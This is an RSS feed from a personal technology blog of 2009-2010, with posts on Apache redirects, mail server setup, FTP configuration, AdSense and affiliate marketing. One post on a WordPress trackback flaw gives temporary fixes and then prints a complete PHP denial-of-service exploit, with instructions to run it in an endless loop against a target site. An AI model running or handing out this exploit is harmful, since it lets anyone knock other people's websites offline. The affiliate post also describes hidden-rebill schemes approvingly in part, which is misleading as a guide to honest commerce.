<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Steve Fortuna</title>
	<atom:link href="http://www.stevefortuna.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stevefortuna.com</link>
	<description>Technology Blog</description>
	<lastBuildDate>Mon, 23 Aug 2010 15:29:54 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Redirect to www with htaccess</title>
		<link>http://www.stevefortuna.com/redirect-to-www/</link>
		<comments>http://www.stevefortuna.com/redirect-to-www/#comments</comments>
		<pubDate>Tue, 23 Mar 2010 18:55:59 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Search Engine Optimization]]></category>
		<category><![CDATA[Webmaster]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=104</guid>
		<description><![CDATA[Many webmasters don&#8217;t take any steps to ensure their website is accessed with http://www.example.com and not http://example.com. One reason to do this can include the presentation of your site in Google&#8217;s search results. Another reason is when you don&#8217;t control what address is presented, Google will make the decision for you. This can lead to [...]]]></description>
			<content:encoded><![CDATA[<p>Many webmasters don&#8217;t take any steps to ensure their website is accessed with http://www.example.com and not http://example.com.  One reason to do this can include the presentation of your site in Google&#8217;s search results.  Another reason is when you don&#8217;t control what address is presented, Google will make the decision for you.  This can lead to issues with duplicate content, splitting of page rank and other SEO benefits, along with confusion when monitoring results in tools like Google Webmaster Tools.</p>
<p>When a person links to your site, they may simple link to http://example.com.  Another person may link to http://www.example.com.  This would be like looking at money.cnn.com vs www.cnn.com.  Google treats these as different websites and can be harmful to the overall rankings for your site.  It is generally a good idea to decide if you want to redirect non www to www.</p>
<p>The solution to this is a rather easy htaccess rule.  To setup a htaccess rule you would create a file called <code> .htaccess </code> in the root folder of your website, sometimes referred to public_html/, or htdocs/.</p>
<p>To enable mod_rewrite, enter this line first if it doesn&#8217;t exist already:</p>
<p><code>RewriteEngine on</code></p>
<p>Then you would put this below:<br />
<code>RewriteCond %{HTTP_HOST} !^www\. [NC]<br />
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]</code></p>
<p>The first line reads the HTTP_HOST, and determines of the first 3 characters are www or not.  If they are not, it continues onto the second line.</p>
<p>The second line takes the HTTP_HOST requested initially, and simply adds www. to it.  The R=301 says that this is a HTTP code 301 permanent redirect, and the L tells the code to stop the rewriting process here and don&#8217;t apply any more rewrite rules.</p>
<p>To sum it up, a simple <code>.htaccess</code> file to redirect non www to www would be:</p>
<p><code>RewriteEngine on<br />
RewriteCond %{HTTP_HOST} !^www\. [NC]<br />
RewriteRule .* http://www.%{HTTP_HOST}%{REQUEST_URI} [R=301,L]</code></p>
<p>It is also possible to redirect www.example.com to example.com.  The code below will do that:<br />
<code>RewriteEngine On<br />
RewriteCond %{HTTP_HOST} ^www\.(.+)$ [NC]<br />
RewriteRule ^(.*)$ http://%1/$1 [R=301,L] </code></p>
<p>I hope this simple mod_rewrite rule will help when you decide to redirect non www urls to www, or the other way around.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/redirect-to-www/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Prevent Smart Pricing</title>
		<link>http://www.stevefortuna.com/prevent-smart-pricing/</link>
		<comments>http://www.stevefortuna.com/prevent-smart-pricing/#comments</comments>
		<pubDate>Tue, 16 Feb 2010 22:36:54 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Webmaster]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=82</guid>
		<description><![CDATA[Whether you know it or not, there is a penalty in place by Google for publishers who don&#8217;t convert well for advertisers. The term used to describe this penalty is &#8220;smart pricing&#8221;. While the information Google provides on this is very sparse and generally not very helpful, some research has been conducted to get more [...]]]></description>
			<content:encoded><![CDATA[<p>Whether you know it or not, there is a penalty in place by Google for publishers who don&#8217;t convert well for advertisers.  The term used to describe this penalty is &#8220;smart pricing&#8221;.  While the information Google provides on this is very sparse and generally not very helpful, some research has been conducted to get more information.</p>
<p>The general definition of smart pricing is when you earn a very small amount per click.  Many times much lower than expected, or you previously earned.  The penalty has been reported upwards of 90% loss in earnings per click.  Often you can even go through your adsense earning history to find when it happened, as it&#8217;s quite apparent when you know what you are looking for.</p>
<p>If you are a &#8220;victim&#8221; of smart pricing it can be very frustrating trying to work your way out of it.  When I put victim in quotes, I mean that many webmasters, whether they know it or not, get themselves into the situation.  Although this isn&#8217;t always the case.</p>
<p>One industry I have experience in is the <a href="http://www.tech-faq.com/proxy.html">proxy</a> industry.  There are many people that do anything they can to &#8216;trick&#8217; users into clicking on ads.  In the short term this may increase your revenue, as you&#8217;re sending more clicks Google&#8217;s way.  But in the long run, it will get you smart priced.  Google will see that the clicks coming from your site are not converting, and are of overall low quality (bounce rate, time on site, etc).  </p>
<p>What should you do to prevent being smart priced, or even fix it if it happens?  Well it&#8217;s simple, rearrange your sites to still clearly display ads to users, but let them choose to click them.  This will help you send only interested visitors to Google&#8217;s ad network.  Rumor has it that smart pricing is re-evaluated near weekly.</p>
<p>Now, keep in mind that all this information is just what I&#8217;ve gained from experience.  It is by no way dead facts, but it makes sense to me.  I&#8217;d appreciate any thoughts on the matters in the comments.  Now go make that money!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/prevent-smart-pricing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Help Fill Food Shelves</title>
		<link>http://www.stevefortuna.com/help-fill-food-shelves/</link>
		<comments>http://www.stevefortuna.com/help-fill-food-shelves/#comments</comments>
		<pubDate>Tue, 15 Dec 2009 15:48:46 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=96</guid>
		<description><![CDATA[Kare 11 &#038; Land O&#8217;Lakes are donating $1 for every person who clicks on their web site. Go to the website listed below and in the upper right corner you will see a small banner: You Click, We Donate . Just simply click on that banner. It&#8217;s that easy. http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx All it takes is a [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.kare11.com/">Kare 11</a> &#038; <a href="http://www.landolakes.com/">Land O&#8217;Lakes</a> are donating $1 for every person who clicks on their web site.   Go to the website listed below and in the upper right corner you will see a small banner: You Click, We Donate .   Just simply click on that banner.   It&#8217;s that easy.</p>
<p><a href="http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx">http://www.landolakesinc.com/company/corporateresponsibility/foundation/default.aspx</a></p>
<p>All it takes is a few seconds, and the money generated can go a long way to help people in need.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/help-fill-food-shelves/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>It Wasn&#8217;t Me</title>
		<link>http://www.stevefortuna.com/it-was-not-me/</link>
		<comments>http://www.stevefortuna.com/it-was-not-me/#comments</comments>
		<pubDate>Fri, 06 Nov 2009 17:07:19 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=88</guid>
		<description><![CDATA[I noticed a spike in traffic yesterday and wondered what the heck was going on. I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud. More information can be found here: http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna I&#8217;d just like to say that if [...]]]></description>
			<content:encoded><![CDATA[<p>I noticed a spike in traffic yesterday and wondered what the heck was going on.  I looked more into it and found out someone with the same name as me had charges filed against them for Conspiracy to Commit Securities Fraud.</p>
<p>More information can be found here: <a href="http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna">http://www.scribd.com/doc/22167590/Information-on-Steven-Fortuna</a></p>
<p>I&#8217;d just like to say that if you made it here searching for that guy, I&#8217;m not him.</p>
<p>I&#8217;m a 24 (25 in a couple days) year old IT geek from Minnesota, not a manager for a hedge fund committing suspected insider trading.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/it-was-not-me/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New 0-Day WordPress Exploit</title>
		<link>http://www.stevefortuna.com/new-0-day-wordpress-exploit/</link>
		<comments>http://www.stevefortuna.com/new-0-day-wordpress-exploit/#comments</comments>
		<pubDate>Mon, 19 Oct 2009 18:36:51 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=66</guid>
		<description><![CDATA[WordPress is vulnerable to a very dirty exploit right now as of 2.8.4. There&#8217;s a resource exhaustion DoS that is floating around the public right now. It&#8217;s a vulnerability in wp-trackbacks.php that hurts. Here&#8217;s the results from a quick test against my server: 13:30:29 up 36 days, 1:06, 12 users, load average: 45.06, 17.11, 6.24 [...]]]></description>
			<content:encoded><![CDATA[<p>WordPress is vulnerable to a very dirty exploit right now as of 2.8.4.  There&#8217;s a resource exhaustion DoS that is floating around the public right now.  It&#8217;s a vulnerability in wp-trackbacks.php that hurts.</p>
<p>Here&#8217;s the results from a quick test against my server:</p>
<p>13:30:29 up 36 days,  1:06, 12 users,  load average: 45.06, 17.11, 6.24</p>
<p>Very dirty.</p>
<p>Here&#8217;s a temporary fix that can be implemented until we get a real patch.</p>
<p>Add the following lines to your Apache 2 config file:<br />
<code>&lt;Files ~ "wp-trackback.php"&gt;<br />
    Order allow,deny<br />
    Deny from all<br />
&lt;/Files&gt;</code><br />
This should be placed in the main config, not a virtual hosts config.  This will disable any URLs with &#8220;wp-trackback.php&#8221; in it.  This is a quick and ugly fix, but will help against this attack.</p>
<p>I expect WordPress will have an update soon.</p>
<p><strong>UPDATE:</strong>  With the help of a friend we have created a quick fix:</p>
<p>In line #47 of wp-trackback.php, add this:</p>
<p><code>if(strlen($charset) &gt; 50)<br />
  die;</code></p>
<p>Here&#8217;s the actual exploit.</p>
<p><code>&lt;?php<br />
/*<br />
 * wordpress Resource exhaustion Exploit<br />
 * http://rooibo.wordpress.com/<br />
 * security@wordpress.org contacted and get a response,<br />
 * but no solution available.<br />
 *<br />
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org &lt;panic@zerial.org&gt;<br />
 *<br />
 * exploiting:<br />
 * you must install php-cli (command line interface)<br />
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done<br />
 *<br />
 */<br />
if(count($argv) &lt; 2)<br />
    die("You need to specify a url to attack\n");<br />
$url = $argv[1];<br />
$data = parse_url($url);<br />
if(count($data) &lt; 2)<br />
    die("The url should have http:// in front of it, and should be complete.\n");<br />
$path = (count($data)==2)?"":$data['path'];<br />
$path = trim($path,'/').'/wp-trackback.php';<br />
if($path{0} != '/')<br />
    $path = '/'.$path;<br />
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);<br />
$charset = "";<br />
$charset = str_pad($charset,140000,"UTF-8,");<br />
$str = 'charset='.urlencode($charset);<br />
$str .= '&amp;url=www.example.com';<br />
$str .= '&amp;title='.$b;<br />
$str .= '&amp;blog_name=lol';<br />
$str .= '&amp;excerpt=lol';<br />
for($n = 0; $n &lt;= 5; $n++){<br />
    $fp = @fsockopen($data['host'],80);<br />
        if(!$fp)<br />
        die("unable to connect to: ".$data['host']."\n");<br />
    $pid[$n] = pcntl_fork();<br />
    if(!$pid[$n]){<br />
        fputs($fp, "POST $path HTTP/1.1\r\n");<br />
        fputs($fp, "Host: ".$data['host']."\r\n");<br />
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");<br />
        fputs($fp, "Content-length: ".strlen($str)."\r\n");<br />
        fputs($fp, "Connection: close\r\n\r\n");<br />
        fputs($fp, $str."\r\n\r\n");<br />
        echo "hit!\n";<br />
    }<br />
}<br />
?&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/new-0-day-wordpress-exploit/feed/</wfw:commentRss>
		<slash:comments>25</slash:comments>
		</item>
		<item>
		<title>Postfix Maildrop Spam Folder</title>
		<link>http://www.stevefortuna.com/postfix-maildrop-spam-folder/</link>
		<comments>http://www.stevefortuna.com/postfix-maildrop-spam-folder/#comments</comments>
		<pubDate>Thu, 17 Sep 2009 17:00:17 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[junk mail]]></category>
		<category><![CDATA[maildrop]]></category>
		<category><![CDATA[postfix]]></category>
		<category><![CDATA[spam filtering]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=40</guid>
		<description><![CDATA[Filtering spam in Postfix is pretty simple.  There&#8217;s some advanced techniques you can use, but simply setting up Spamassassin will suit many people.  One downside is seeing all the ***** SPAM ***** mails in your inbox.  It took a while to come up with a solution, but the best fit so far has been implementing [...]]]></description>
			<content:encoded><![CDATA[<p>Filtering spam in Postfix is pretty simple.  There&#8217;s some advanced techniques you can use, but simply setting up Spamassassin will suit many people.  One downside is seeing all the ***** SPAM ***** mails in your inbox.  It took a while to come up with a solution, but the best fit so far has been implementing Maildrop to automatically move those files to a Junk folder.  Here&#8217;s the steps to set this up on a Debian 5.0 system with Postfix and Spamassassin.</p>
<p>First, setup your /etc/maildroprc file:</p>
<pre>
# commands and variables for making the mail directories
maildirmake=/usr/bin/maildirmake
mkdir=/bin/mkdir
rmdir=/bin/rmdir
MAILDIR=$DEFAULT

# make the user's mail directory if it doesn't exist
`test -e $MAILDIR`
if ($RETURNCODE != 0)
{
`$mkdir -p $MAILDIR`
`$rmdir $MAILDIR`
`$maildirmake $MAILDIR`
}

# make the .Junk folder if it doesn't exist
JUNK_FOLDER=.Junk
_JUNK_DEST=$MAILDIR/$JUNK_FOLDER/
`test -d $_JUNK_DEST`
if ($RETURNCODE != 0 )
{
`$maildirmake $_JUNK_DEST`
#auto subscribe. the following works for courier-imap
`echo INBOX.Junk &gt;&gt; $MAILDIR/courierimapsubscribed`
}

# If the Spam-Flag is set, move the mail to the Junk folder
if (/^X-Spam-Flag:.*YES/)
{
exception {
to $DEFAULT/.Junk/
}
}
</pre>
<p>The comments clearly state what&#8217;s going on there.</p>
<p>Once that&#8217;s setup, you will go into your /etc/postfix/master.cf and make sure the</p>
<pre>maildrop  unix  -       n       n       -       -       pipe
  flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}</pre>
<p>is not commented out.</p>
<p>Next you will have to set the /usr/bin/maildrop file setuid root.  This is so maildrop can interact with authdaemon and the mail folders.</p>
<pre>#chmod +s /usr/bin/maildrop</pre>
<p>The last thing you have to do is add this to your /etc/postfix/main.cf file:</p>
<pre>virtual_transport = maildrop
maildrop_destination_recipient_limit = 1</pre>
<p>If there is another virtual_transport line, be sure to comment that out first.</p>
<p>And that&#8217;s all.  Nice and simple way to handle all that Junk mail.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/postfix-maildrop-spam-folder/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Debian Pure-FTPD Virtual Users Howto</title>
		<link>http://www.stevefortuna.com/debian-pure-ftpd-virtual-users-howto/</link>
		<comments>http://www.stevefortuna.com/debian-pure-ftpd-virtual-users-howto/#comments</comments>
		<pubDate>Mon, 07 Sep 2009 20:37:09 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[debian]]></category>
		<category><![CDATA[ftp howto]]></category>
		<category><![CDATA[howto]]></category>
		<category><![CDATA[pure-ftpd]]></category>
		<category><![CDATA[virtual users]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=35</guid>
		<description><![CDATA[After being a dedicated Gentoo user, I&#8217;ve recently moved over to Debian.  Hoping to work more on productive tasks, than just administrating my servers.  In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo. I thought I&#8217;d write up a quick how [...]]]></description>
			<content:encoded><![CDATA[<p>After being a dedicated Gentoo user, I&#8217;ve recently moved over to Debian.  Hoping to work more on productive tasks, than just administrating my servers.  In the switch I had to configure Pure-FTPD to use virtual users, and the config files are quite a bit different than Gentoo.</p>
<p>I thought I&#8217;d write up a quick how to on how to configure Pure-FTPD with virtual users in Debian, as sort of a personal reference, and in hope someone else will be able to put it to use.  And here we go..</p>
<p>Enable PureDB authentication:</p>
<p># cd /etc/pure-ftpd/auth</p>
<p># ln -s ../conf/PureDB 50pure</p>
<p>To disable PAM authentication and UNIX authentication so you only have virtual users:<br />
# echo no &gt; /etc/pure-ftpd/conf/PAMAuthentication</p>
<p># echo no &gt; /etc/pure-ftpd/conf/UnixAuthentication</p>
<p>That&#8217;s it.  Simple, but when coming from a single config file, this isn&#8217;t at all intuitive &#8211; at least to me.</p>
<p>I&#8217;ve always recommended Pure-FTPD for it&#8217;s security, features, and simplicity.  You can find out more information at the official Pure-FTPD projects website: <a title="Pure-FTPD" href="http://www.pureftpd.org">www.Pure-FTPD.org</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/debian-pure-ftpd-virtual-users-howto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>First Profitable Campaign</title>
		<link>http://www.stevefortuna.com/first-profitable-campaign/</link>
		<comments>http://www.stevefortuna.com/first-profitable-campaign/#comments</comments>
		<pubDate>Fri, 10 Jul 2009 01:31:06 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Affiliate Marketing]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=29</guid>
		<description><![CDATA[Haven&#8217;t posted in a while &#8211; as there wasn&#8217;t really anything to talk about.  I&#8217;ve established a handful of arcade sites in the last few weeks.  My goal there is to build up a solid network so I can trade traffic between the sites, and give myself some sites to link from when exchanging links [...]]]></description>
			<content:encoded><![CDATA[<p>Haven&#8217;t posted in a while &#8211; as there wasn&#8217;t really anything to talk about.  I&#8217;ve established a handful of arcade sites in the last few weeks.  My goal there is to build up a solid network so I can trade traffic between the sites, and give myself some sites to link from when exchanging links for hubits.  Some of the sites are: <a href="http://www.gemarcade.com">gemarcade.com</a>, <a href="http://www.arcadeswamp.com">arcadeswamp.com</a>, <a href="http://www.digarcade.com">digarcade.com</a>, <a href="http://www.castledefence.org">castledefence.org</a>, <a href="http://www.parkinggame.net">parkinggame.net</a>, and <a href="http://www.instarcade.com">instarcade.com</a>.  There&#8217;s a few others, but not worth mentioning.</p>
<p>But I have managed to run into an affiliate network that has been very helpful in getting me setup with a campaign.  I&#8217;m currently running some Facebook ads for a simple free signup.  Low payout, but also low cost to advertise.  It&#8217;s pretty exciting, and I&#8217;m hoping to simply generate some revenue I can invest into some bigger offers.  I&#8217;d love to share all the details, but I&#8217;m not at the point where I can afford to, or know enough about it to be more useful than the many other sites talking about it.  One being <a href="http://www.nickycakes.com">nickycakes.com</a>.</p>
<p>The campaign really wasn&#8217;t anything to brag about.  Simply making $10 on a $80 investment.  But for me it&#8217;s a relief to finally break even, let alone make money.  Well, let&#8217;s hope the earnings go up from here.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/first-profitable-campaign/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Taking a step back</title>
		<link>http://www.stevefortuna.com/taking-a-step-back/</link>
		<comments>http://www.stevefortuna.com/taking-a-step-back/#comments</comments>
		<pubDate>Fri, 29 May 2009 23:34:47 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[General]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=27</guid>
		<description><![CDATA[Well I got this site up and going, got on to the first page of when searching Google for Steve Fortuna&#8230;and I have no readers. Blogging to myself is a blast!  Haha, no.  Blogging is kind of entertaining, but not really my thing.  I&#8217;m going to take a step back, and focus less on posting [...]]]></description>
			<content:encoded><![CDATA[<p>Well I got this site up and going, got on to the first page of when searching Google for Steve Fortuna&#8230;and I have no readers.</p>
<p>Blogging to myself is a blast!  Haha, no.  Blogging is kind of entertaining, but not really my thing.  I&#8217;m going to take a step back, and focus less on posting regularly.  What&#8217;s the point, right?  When the traffic picks up, or I come up with some really good post ideas, I wont hesitate to post.</p>
<p>And I&#8217;m out.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/taking-a-step-back/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Affiliate Marketing</title>
		<link>http://www.stevefortuna.com/affiliate-marketing/</link>
		<comments>http://www.stevefortuna.com/affiliate-marketing/#comments</comments>
		<pubDate>Wed, 27 May 2009 20:32:10 +0000</pubDate>
		<dc:creator>steve</dc:creator>
				<category><![CDATA[Affiliate Marketing]]></category>

		<guid isPermaLink="false">http://www.stevefortuna.com/?p=22</guid>
		<description><![CDATA[I&#8217;ve heard a lot about affiliate marketing in the past, but was never really interested.  It seemed to me that you just sold products for someone else for a tiny piece of the profit.  Seemed pointless, and a lot of effort for not much return. That was until I read through a blog called Nickycakes.  [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve heard a lot about affiliate marketing in the past, but was never really interested.  It seemed to me that you just sold products for someone else for a tiny piece of the profit.  Seemed pointless, and a lot of effort for not much return.</p>
<p>That was until I read through a blog called <a href="http://www.nickycakes.com" target="_blank">Nickycakes</a>.  The title of the blog is Reformed Blackhat, which seemed interesting.  I ended up at the newbie affiliate marketing section &#8211; and boy did it peak my interest.  This guy has an attitude I like, gets straight to the point, and opened up a whole new way of making money online for me.</p>
<p>After reading through the entire guide, I decided I would give affiliate marketing a shot.  Essentially what you do is create a page, or landing page, and send traffic to it.  The goal of the landing page is to convince the user to sign up/buy/do whatever for your product.  These can be anywhere from simple ad looking pages, to review sites, or even flogs (fake blogs).  The whole idea of it seems real interesting so I started right up.</p>
<p>Turns out it is a lot more shady than I had expected.  A lot of money is made on rebills (billing someone after the initial $2 or whatever), generally without their knowledge.  Terms of Service stating the rebill is hidden at the bottom of the page or anywhere out of sight.  Most of the products are sub par, and a Google search reveals them to be mostly a scam.</p>
<p>Now I personally wouldn&#8217;t be opposed to promoting some of the products, as it&#8217;s not like you&#8217;re stealing.  Technically the terms are explained to them.  It&#8217;s like the offer is an IQ test in iteself (one of the products offered).  If they don&#8217;t sign up, average to above average IQ, but if they do &#8211; they fail the IQ test.  Haha.  But this is only one method of affiliate marketing.</p>
<p>One other type of affiliate marketing I&#8217;ve began to explore is local affiliate marketing.  You don&#8217;t sell a product hundreds, if not thousands, of others are selling online.  You sell local products/services that local businesses provide.  This, in my opinion, is a lot more ethical &#8211; and even has a chance to earn a lot more money.</p>
<p>Simply contact businesses and setup relations to sell products for them.  I am three days into my first campaign of local affiliate marketing, and experimenting with PPC advertising and some SEO advertising.  Nothing interesting to report, as the 20 people total who went to my landing page so far aren&#8217;t a good display of the results I should expect.  It&#8217;s fun and interesting though.  The potential is there, it&#8217;s just making it work.</p>
<p>For more information on local affiliate marketing, check out: <a href="http://www.shoemoney.com/2008/11/04/making-money-with-local-affiliate-programs">http://www.shoemoney.com/2008/11/04/making-money-with-local-affiliate-programs</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.stevefortuna.com/affiliate-marketing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
